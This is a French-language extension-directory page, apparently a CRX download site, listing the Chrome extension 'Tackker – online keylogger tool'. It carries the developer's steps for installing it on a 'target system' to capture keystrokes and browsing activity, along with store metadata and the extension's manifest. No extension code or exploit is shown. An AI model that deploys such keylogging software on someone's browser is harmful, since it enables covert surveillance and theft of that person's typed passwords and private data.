Tackker - online keylogger tool

Tackker is online keylogger tool that helps you log the keystrokes and other user data.

Qu'est-ce que Tackker - online keylogger tool ?

Tackker - online keylogger tool est une extension Chrome développée par https://tackker.com, et sa fonction principale est "Tackker is online keylogger tool that helps you log the keystrokes and other user data.".

Captures d'Écran de l'Extension

screenshot
screenshot
screenshot
screenshot

Télécharger le fichier CRX de l'extension Tackker - online keylogger tool

Téléchargez les fichiers d'extension Tackker - online keylogger tool au format crx, installez manuellement les extensions Chrome dans le navigateur ou partagez les fichiers crx avec des amis pour installer facilement les extensions Chrome.

Instructions d'Utilisation de l'Extension

                        tackker is online keylogger tool that helps you log the keystrokes and other user data. It can be used for child monitoring as well as employee monitoring.
Tackker collects your click stream browsing activity - anonymously, for the purpose of analyzing and ensuring the keylogger is running smoothly.

tackker have made browser activity monitoring so easy. Monitor any browser activity by following these simple steps:

1) Install tackker on target system browser(s).
2) After installation, you will be directed to register/login (this part is important since without registering you can not see the logged data).
3) Once you are registered and the plugin is installed , simply monitor user activity from our online dashboard.                    

Informations de Base sur l'Extension

Nom Tackker - online keylogger tool Tackker - online keylogger tool
ID ekpkdmohpdnebfedjjfklhpefgpgaaji
URL Officiel https://chromewebstore.google.com/detail/tackker-online-keylogger/ekpkdmohpdnebfedjjfklhpefgpgaaji
Description Tackker is online keylogger tool that helps you log the keystrokes and other user data.
Taille du Fichier 161 KB
Nombre d'Installations 20,000
Version Actuelle 1.3
Dernière Mise à Jour 2023-10-06
Date de Publication 2020-10-01
Évaluation 4.03/5 Total 37 Évaluations
Développeur https://tackker.com
Email [email protected]
Type de Paiement free
Site Web de l'Extension https://www.tackker.com
Langues Prises en Charge en-US
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "manifest_version": 3,
    "name": "Tackker - online keylogger tool",
    "description": "Tackker is online keylogger tool that helps you log the keystrokes and other user data.",
    "version": "1.3",
    "icons": {
        "128": "tackker-keylogger128.png",
        "48": "tackker-keylogger48.png",
        "16": "tackker-keylogger16.png"
    },
    "action": [],
    "background": {
        "service_worker": "back.js",
        "type": "module"
    },
    "content_scripts": [
        {
            "matches": [
                ""
            ],
            "js": [
                "jquery-3.5.0.min.js",
                "content.js"
            ]
        }
    ],
    "permissions": [
        "alarms",
        "tabs",
        "webRequest",
        "webNavigation",
        "scripting",
        "storage",
        "unlimitedStorage"
    ]
}